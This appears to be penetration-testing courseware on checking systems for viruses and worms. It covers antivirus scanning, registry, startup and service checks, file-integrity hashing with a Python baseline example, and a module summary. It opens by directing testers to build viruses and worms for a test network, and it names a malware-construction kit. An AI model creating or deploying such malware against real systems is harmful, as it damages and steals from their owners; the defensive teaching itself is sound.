Since you are an expert Ethical Hacker and Penetration Tester, the IT director instructs you to test the network for any viruses and worms that could damage or steal the organization's information. You need to construct viruses and worms and try to inject them into a dummy network (virtual machine) and check whether they are detected by antivirus programs or are able to bypass the network firewall. As a pen tester, you should carry out the following steps to conduct a virus penetration test:

Step 1: Install an antivirus program
You should install an antivirus program on the network infrastructure and on the end-user's system before conducting the penetration test.

Step 2: Update the antivirus software
Check whether your antivirus is updated or not. If not, update your antivirus software.

Step 3: Scan the system for viruses
You should scan your target system; this will help you to repair damage or delete files infected with viruses.
Penetration Testing for Viruses (Cont'd)

(Flowchart) Scan result "System is not infected" -> System is safe. Otherwise: Set the anti-virus to quarantine or delete the virus -> Virus is removed? Yes -> System is safe; No -> Go to safe mode and delete the infected file manually.

• Set the anti-virus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible or delete them if not
• If the virus is not removed, then go to safe mode and delete the infected file manually
Penetration Testing for Viruses (Cont'd)

Step 4: Set the antivirus to quarantine or delete the virus
Set your antivirus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible, or delete them if not.

Step 5: Go to safe mode and delete the infected file manually
If the virus is not removed, then go to safe mode and delete the infected file manually.
Penetration Testing for Viruses (Cont'd)

• Scan the system for running processes, registry entries, startup programs, files and folders integrity, and services
• If any suspicious process, registry entry, startup program, or service is discovered, check the associated executable files
• Collect more information about these from the publishers' websites, if available, and the Internet
• Check the startup programs and determine if all the programs in the list can be recognized with known functionalities
• Check the data files for modification or manipulation by opening several files and comparing the hash value of these files with a pre-computed hash

Scan for running processes: use tools such as What's Running and Winsonar
Scan for Windows registry entries: use tools such as jv16 Power Tools 2012 and Reg Organizer
Scan for Windows services: use tools such as SrvMan and ServiWin
Scan for startup programs: use tools such as Starter, Security AutoRun, and Autoruns
Scan for files and folders integrity: use tools such as FCIV, TRIPWIRE, and SIGVERIF
Penetration Testing for Viruses (Cont'd)

Step 6: Scan the system for running processes
You should scan your system for suspicious running processes. You can do this by using tools such as What's Running, HijackThis, etc.

Step 7: Scan the system for suspicious registry entries
You should scan your system for suspicious registry entries. You can do this by using tools such as JV Power Tools and RegShot.

Step 8: Scan the system for Windows services
You should scan for suspicious Windows services running on your system. You can do this by using tools such as SrvMan and ServiWin.

Step 9: Scan the system for startup programs
You should scan your system for suspicious startup programs running on your system. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs.

Step 10: Scan the system for files and folders integrity
You should scan your system for file and folder integrity. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF.
Penetration Testing for Viruses (Cont'd)

• Check the critical OS files for modification or manipulation using tools such as TRIPWIRE, or by manually comparing hash values if you have a backup copy
• Document all your findings in the previous steps; it helps in determining the next action if viruses are identified in the system
• Isolate the infected system from the network immediately to prevent further infection
• Sanitize the complete system for viruses using an updated anti-virus

Scan for modification to OS files: use tools such as FCIV and TRIPWIRE
Document all the findings
Isolate the machine from the network
Update and run antivirus; find another anti-virus solution to clean viruses
Penetration Testing for Viruses (Cont'd)

Step 11: Scan the system for critical OS modifications
You can scan for critical OS file modifications or manipulation using tools such as TRIPWIRE, or by manually comparing hash values if you have a backup copy.

Step 12: Document all findings
These findings can help you determine the next action if viruses are identified on the system.

Step 13: Isolate the infected system
Once an infected system is identified, you should isolate it from the network immediately in order to prevent further infection.

Step 14: Sanitize the complete infected system
You should remove virus infections from your system by using the latest updated antivirus software.
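Steps 10 and 11 both rest on the same mechanism: hashing files while the system is known clean and later comparing current hashes against that pre-computed baseline. The following Python is an added example, not courseware code and not FCIV or TRIPWIRE; the helper names, the directory layout and the file contents are all constructed for the demonstration.

```python
import hashlib
import json
import tempfile
from pathlib import Path

def sha256_of(path: Path) -> str:
    """SHA-256 of a file, read in 64 KiB chunks so large binaries do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root: Path) -> dict:
    """Record relative path -> SHA-256 for every file under root (the pre-computed hashes)."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare_baseline(root: Path, baseline: dict) -> dict:
    """Re-hash the tree and report files whose hash changed, new files, and missing files."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }

def demo() -> dict:
    """Constructed scenario in a temporary directory: take a baseline, then alter the tree."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "app.exe").write_bytes(b"original program bytes")
        (root / "config.ini").write_text("setting=1\n")
        # Baseline taken while the tree is known clean; the JSON round trip shows it can be
        # stored offline (e.g. with the backup copy) for a later comparison.
        baseline = json.loads(json.dumps(build_baseline(root)))
        # Simulated changes a later integrity scan should flag: an executable altered in place,
        # a file that was not in the baseline, and a file that has gone missing.
        with open(root / "bin" / "app.exe", "ab") as f:
            f.write(b"appended bytes")
        (root / "bin" / "unknown.exe").write_bytes(b"not in baseline")
        (root / "config.ini").unlink()
        return compare_baseline(root, baseline)

if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

A modified entry under a system or program directory is the signal Step 11 looks for; the same comparison over user data files implements Step 10.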
Module Summary

□ A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction
□ Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a predetermined logical circumstance is met
□ Viruses are categorized according to the file they infect and the way they work
□ The lifecycle of viruses and worms includes the designing, replication, launching, detection, incorporation and elimination stages
□ A computer gets infected by viruses, worms and other malware due to not running the latest anti-virus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected e-mail attachments or downloading files without checking properly for the source
□ Several virus and worm development kits such as JPS Virus Maker are available in the wild that can be used to create malware without any technical knowledge
□ Virus detection methods include system scanning, file integrity checking and monitoring OS requests
□ Virus and worm countermeasures include installing anti-virus software and following an anti-virus policy for safe computing
Module Summary

• A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction.
• Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met.
• Viruses are categorized according to the file they infect and the way they work.
• The lifecycle of viruses and worms includes the designing, replication, launching, detection, incorporation, and elimination stages.
• A computer gets infected by viruses, worms, and other malware due to not running the latest antivirus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected email attachments, or downloading files without checking properly for the source.
• Several virus and worm development kits such as JPS Virus Maker are available in the wild that can be used to create malware without any technical knowledge.
• Virus detection methods include system scanning, file integrity checking, and monitoring OS requests.
• Virus and worm countermeasures include installing antivirus software and following antivirus policies for safe computing.